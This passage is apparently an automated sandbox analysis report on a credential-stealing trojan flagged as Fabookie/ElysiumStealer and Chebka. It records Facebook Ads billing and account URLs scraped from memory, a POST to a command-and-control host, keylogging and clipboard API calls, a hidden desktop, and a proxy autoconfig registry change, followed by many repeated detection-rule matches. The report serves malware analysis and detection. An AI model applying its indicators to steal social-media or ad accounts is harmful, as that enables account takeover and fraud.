sAssetID%22%3A%22%22%2C%22bypassAssetTypeEnum%22%3A%22AD_ACCOUNT%22%2C%22bypassPermission%22%3Afalse%2C%22includeAllContainedAssetsIfBusinessAdmin%22%3Afalse%2C%22includeProfilePlusDelegatePages%22%3Afalse%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BusinessUnifiedScopingLocalSelectorSearchSourceQuery&doc_id=4492650077503003business_scopingglobal_scopesscope_namescope_idasset_listsasset_typeAD_ACCOUNTobjectsasset_idPragma: no-cache equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/Pragma: no-cache equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/accountquality/?landing_page=insights equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/ equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act= equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/billing_history/summary/ equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag= equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/friends equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/friends/list equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login/device-based/turn-on/ equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/marketplace?ref=bookmark equals www.facebook.com (Facebook)
      Source: svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/marketplace?ref=bookmarkflow=logged_in_settings&reload=1&__a=1&__user=https://www.facebook.com/login/device-based/turn-on/&fb_api_req_friendly_name=CometSinglePageRootQuery&variables=%7B%22height%22%3A132%2C%22pageID%22%3A%22%22%2C%22scale%22%3A1%2C%22width%22%3A132%7D&server_timestamps=true&doc_id=8186721178034804pageoverall_star_ratingvalue&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=CometPageCardsContainerQuery&variables=%7B%22location%22%3A%22SECONDARY_COLUMN%22%2C%22pageID%22%3A%22%22%2C%22scale%22%3A1%2C%22useDefaultActor%22%3Afalse%7D&server_timestamps=true&doc_id=5357079284328970comet_page_cardsfollower_count&_sessionID=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubCommerceAccountAndCatalogCard_viewerCommerceDataQuery&variables=%7B%22assetOwnerId%22%3A%22%22%2C%22locationPageID%22%3Anull%7D&server_timestamps=true&doc_id=7545025648841185viewerDataadmined_pages00000000000000000000000000000000kernel32.dllRtlGetNtVersionNumbersntdll.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%sInstallLocation\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%sGoogle ChromeMicrosoft EdgeYandexBrowserSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\UninstallLauncher.exehttps://www.instagram.com/accounts/edit/"viewerId":""username":""email":""phone_number":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36HTTP/1.0Cookie: equals www.facebook.com (Facebook)
      Source: unknownHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49754 version: TLS 1.2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425B840 GetAsyncKeyState,Sleep,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,10_2_0425B840
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042574B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_042574B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04257510 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,10_2_04257510

      E-Banking Fraud

      barindex
      Source: C:\Windows\System32\svchost.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://35.236.159.79/win.pacJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042565A0 CreateEventW,OpenDesktopW,CreateDesktopW,SetThreadDesktop,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplaySettingsW,GetDC,CreateCompatibleDC,GetVersionExA,10_2_042565A0

      System Summary

      barindex
      Source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
      Source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
      Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
